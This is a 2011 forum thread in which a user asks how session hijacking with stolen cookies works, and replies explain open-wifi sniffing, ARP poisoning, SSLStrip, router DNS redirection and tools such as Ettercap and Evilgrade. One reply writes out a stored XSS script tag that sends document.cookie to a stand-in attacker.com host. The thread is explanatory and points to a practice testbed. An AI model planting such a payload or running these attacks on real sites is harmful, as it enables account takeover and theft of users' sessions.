
session hijacking and cookies

  • 07-06-2011 9:14pm
    #1
    Closed Accounts Posts: 292 ✭✭


    In session hijacking, are the cookies unencrypted if the connection to the router is encrypted? Also, if one steals the cookie, does the original person still have to be logged in before the hijacker can log in? And where does the hijacker use the stolen cookie to log in?

    Does the hijacker have to be on the same LAN? In an internet cafe, is everyone on the same LAN? I am interested in network security, hence these questions.


Comments

  • Closed Accounts Posts: 5,082 ✭✭✭Pygmalion


    Resend wrote: »
    in session hijacking are the cookies unencrypted if the connection to router is encrypted?

    Yes, unless the user is connecting to the site securely; sites such as Paypal will only accept secure connections, sites like Facebook and Twitter have the option of enforcing it.
    also if one steals the cookie does the original person still have to be logged in before the hijacker can log in?
    Yeah, generally once the user logs out their cookies are useless.
    And where does the hijacker use the stolen cookie to log in?
    The browser stores it and sends it each time it wants to get a page (until the session ends, by logging out or closing the browser).
    There are plenty of extensions and stuff for browsers that let you set/change them; generally when you steal one you'd use one of these.
    does hijacker have to be on same lan?
    You need to be able to capture the information they send.
    Generally (almost always) this occurs when two people are on the same unsecured wireless network.
    In an internet cafe everyone is on the same lan?
    Yes but generally wired networks aren't as vulnerable.
    It's possible someone could steal traffic by taking over the router or through something like ARP Poisoning, but this would be rare, and generally internet cafés would be aware of these risks and take precautions.

    If I got anything wrong or left anything out I'm sure someone will jump in and reprimand correct me :P


  • Closed Accounts Posts: 292 ✭✭Resend


    Thanks
    Pygmalion wrote: »
    The browser stores it and sends it each time it wants to get a page (until the session ends, by logging out or closing the browser).
    There are plenty of extenstions and stuff for browsers that let you set/change them, generally when you steal one you'd use one of these.

    I do not understand this part. Imagine:
    Insecure LAN
    A is logged in to anysite.com
    B steals his cookie
    Where does B enter the cookie when browsing to anysite.com to be able to impersonate A?
    If I got anything wrong or left anything out I'm sure someone will jump in and reprimand correct me :P
    I would say you won't have long to wait :D


  • Registered Users Posts: 8,811 ✭✭✭BaconZombie


    OP, have a read of this first:

    http://cscis12.dce.harvard.edu/lecture_notes/2009/20090721/handout.html

    The section on Cookies starts on slide 34.



  • Registered Users Posts: 1,691 ✭✭✭JimmyCrackCorn


    SSL:

    As an addition SSL is not guaranteed to be safe.

    Man in the middle attacks do work on SSL. There are tools that strip certificates.

    Also, accepting a bad certificate or registering a bad certificate voids SSL's protection.

    I'm currently playing with a piece of code to hook winsock functions including Calls used to send and receive Data using ssl making it ineffective. (I'm messing with rootkits and other stuff )


    So what I'm saying is there's more than one way to skin a cat.


    Do I have to be on the local network?

    No. Scenario 1:

    I compromised your router a month ago and have it pointing at my evil DNS server. I can re-direct your traffic wherever I want.

    Scenario 2:

    I've compromised your PC and have remote access. You're screwed.



    So it can get complicated quickly but as you can see no simple answers.


  • Closed Accounts Posts: 20,759 ✭✭✭✭dlofnep


    SSLStrip is used for SSL connections. I wrote a small paper demonstrating it with an ARP MITM attack.

    As for hijacking - you don't have to be on the same lan. It can be accomplished a number of ways. One is through XSS, where a script on a remote server is executed, with a parameter passed with the value of document.cookie().

    An example might look as follows.

    Attacker inserts stored XSS, which silently executes the following when the victim, unbeknownst to them, loads the page.
    <script>new Image().src="http://attacker.com/steal.php?value="+encodeURI(document.cookie);</script>
    

    On the attacker's side, they will need a script that reads the passed value, and then store it to either a flat-file, or database.

    If you download mutillidae (a web-hacking testbed), you can practice on that.


  • Closed Accounts Posts: 452 ✭✭Phractal


    Over a LAN probably the single most amazing tool I have used is Evilgrade. Takes f*cking AGES to make it work, but once it does work, you can have most any box pwned in moments thanks to basic social engineering and insecure update mechanisms.

    As for MITM, cookie stealing is a big enough threat, but simply sitting there and MITM-ing you is FAR easier with Ettercap and SslStrip...

